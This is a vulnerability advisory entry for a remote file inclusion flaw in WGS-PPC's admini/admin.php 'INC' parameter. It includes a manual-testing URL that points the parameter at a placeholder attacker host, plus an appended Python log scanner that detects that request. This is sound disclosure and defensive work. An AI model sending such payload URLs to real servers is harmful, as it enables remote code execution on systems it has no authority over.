WGS-PPC (PPC Search Engine) admini/admin.php INC Variable Remote File Inclusion

2007-02-23T01:13:34
ID OSVDB:33448
Type osvdb
Reporter IbnuSina(emel_gw_ini@yahoo.com)
Modified 2007-02-23T01:13:34

Description

Vulnerability Description

WGS-PPC (aka PPC Search Engine) contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the admini/admin.php script not properly sanitizing user input supplied to the 'INC' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

The vendor has discontinued this product and therefore has no patch or upgrade that mitigates this problem. It is recommended that an alternate software package be used in its place.

Manual Testing Notes

http://[target]/path/admini/admin.php?INC=http://[attacker]?
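Because no patch exists, sites that still run the package can search web-server access logs for the request shape shown above. The following Python sketch is an added example, not part of the OSVDB entry; the Apache combined-style log format, the sample lines and the function name find_remote_inc are assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample log lines (documentation addresses and hostnames only).
SAMPLE_LOG = """\
192.0.2.10 - - [23/Feb/2007:01:10:00 +0000] "GET /ppc/admini/admin.php?INC=settings HTTP/1.1" 200 512
192.0.2.77 - - [23/Feb/2007:01:11:12 +0000] "GET /ppc/admini/admin.php?INC=http://files.example.net/x.txt? HTTP/1.1" 200 90
192.0.2.77 - - [23/Feb/2007:01:11:40 +0000] "GET /ppc/admini/admin.php?a=1&INC=hTtP%3A%2F%2Ffiles.example.net%2Fx.txt%3F HTTP/1.1" 200 90
192.0.2.15 - - [23/Feb/2007:01:12:00 +0000] "GET /ppc/index.php?INC=http://files.example.net/ HTTP/1.1" 404 0
"""

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')
# Any "scheme://" prefix marks the value as a URL rather than a local name.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def find_remote_inc(log_text):
    """Return (client, decoded INC value) for each request to
    admini/admin.php whose INC parameter carries a URL."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        client, target = m.groups()
        path, _, query = target.partition("?")
        # Compare the decoded, lower-cased path so encoded or mixed-case
        # spellings of the script name are still recognised.
        if not unquote(path).lower().endswith("/admini/admin.php"):
            continue
        # parse_qsl percent-decodes values, so %3A%2F%2F is seen as "://".
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == "INC" and SCHEME.match(value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in find_remote_inc(SAMPLE_LOG):
        print(f"{client} requested admin.php with remote INC value {value!r}")
```

Access logs record only the query string, so a value sent in a POST body would not appear here and needs request-body logging or a WAF rule instead.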

References:

Related OSVDB ID: 33445
Related OSVDB ID: 33452
Related OSVDB ID: 33447
Related OSVDB ID: 33454
Related OSVDB ID: 33444
Related OSVDB ID: 33446
Related OSVDB ID: 33449
Related OSVDB ID: 33451
Related OSVDB ID: 33453
Related OSVDB ID: 33450
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0237.html
Mail List Post: http://attrition.org/pipermail/vim/2007-January/001221.html
ISS X-Force ID: 31355
Generic Exploit URL: http://milw0rm.com/exploits/3104
CVE-2007-0167
Bugtraq ID: 21961